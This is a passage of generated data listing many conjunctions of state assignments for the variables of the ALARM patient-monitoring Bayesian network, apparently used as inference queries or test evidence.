<< {'HIGH'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'LOW'}) & (PAP << {'HIGH'}) & (PCWP << {'NORMAL'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'LOW'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'LOW'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'NORMAL'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'NORMAL'}) & (HRBP << {'LOW'}) & (HREKG << {'LOW'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'LOW'}) & (PCWP << {'NORMAL'}) & (PRESS << {'NORMAL'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'LOW'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'NORMAL'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'NORMAL'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'LOW'}) & (PCWP << {'NORMAL'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'LOW'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'HIGH'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'LOW'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'LOW'}) & (PAP << {'NORMAL'}) & (PCWP << {'NORMAL'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'LOW'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'NORMAL'}) & (HRBP << {'LOW'}) & (HREKG << {'HIGH'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << 
{'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'LOW'}) & (PAP << {'LOW'}) & (PCWP << {'HIGH'}) & (PRESS << {'NORMAL'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'LOW'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'LOW'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'LOW'}) & (CATECHOL << {'HIGH'}) & (CO << {'LOW'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'LOW'}) & (PCWP << {'NORMAL'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'HIGH'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'LOW'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'HIGH'}) & (HREKG << {'LOW'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'HIGH'}) & (PCWP << {'NORMAL'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'HIGH'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'LOW'}) & (PCWP << {'LOW'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'LOW'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'NORMAL'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'TRUE'}) 
& (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'HIGH'}) & (PCWP << {'NORMAL'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'LOW'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'NORMAL'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'LOW'}) & (PCWP << {'NORMAL'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'LOW'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'HIGH'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'NORMAL'}) & (PCWP << {'NORMAL'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'HIGH'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'LOW'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'LOW'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'LOW'}) & (HRBP << {'LOW'}) & (HREKG << 
{'HIGH'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'LOW'}) & (PAP << {'LOW'}) & (PCWP << {'LOW'}) & (PRESS << {'NORMAL'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'LOW'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'HIGH'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'HIGH'}) & (HREKG << {'HIGH'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'HIGH'}) & (PCWP << {'LOW'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'LOW'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'NORMAL'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'NORMAL'}) & (HREKG << {'HIGH'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'LOW'}) & (PAP << {'NORMAL'}) & (PCWP << {'NORMAL'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'NORMAL'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'NORMAL'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'NORMAL'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'NORMAL'}) & (HISTORY << 
{'FALSE'}) & (HR << {'NORMAL'}) & (HRBP << {'HIGH'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'LOW'}) & (PCWP << {'HIGH'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'LOW'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'LOW'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'NORMAL'}) & (CATECHOL << {'HIGH'}) & (CO << {'LOW'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'LOW'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'HIGH'}) & (PCWP << {'NORMAL'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'LOW'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'HIGH'}) & (CO << {'NORMAL'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'HIGH'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'LOW'}) & (PCWP << {'HIGH'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'HIGH'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'HIGH'}) & (CVP << {'LOW'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'NORMAL'}) & (HREKG << {'HIGH'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'HIGH'}) & (PCWP << {'LOW'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'LOW'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'HIGH'}) & (CO << {'NORMAL'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << 
{'NORMAL'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'LOW'}) & (HRBP << {'NORMAL'}) & (HREKG << {'HIGH'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'LOW'}) & (PCWP << {'HIGH'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'LOW'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'HIGH'}) & (CATECHOL << {'HIGH'}) & (CO << {'LOW'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'HIGH'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'HIGH'}) & (PCWP << {'LOW'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'LOW'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'LOW'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'HIGH'}) & (CATECHOL << {'HIGH'}) & (CO << {'LOW'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'NORMAL'}) & (PCWP << {'LOW'}) & (PRESS << {'NORMAL'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & 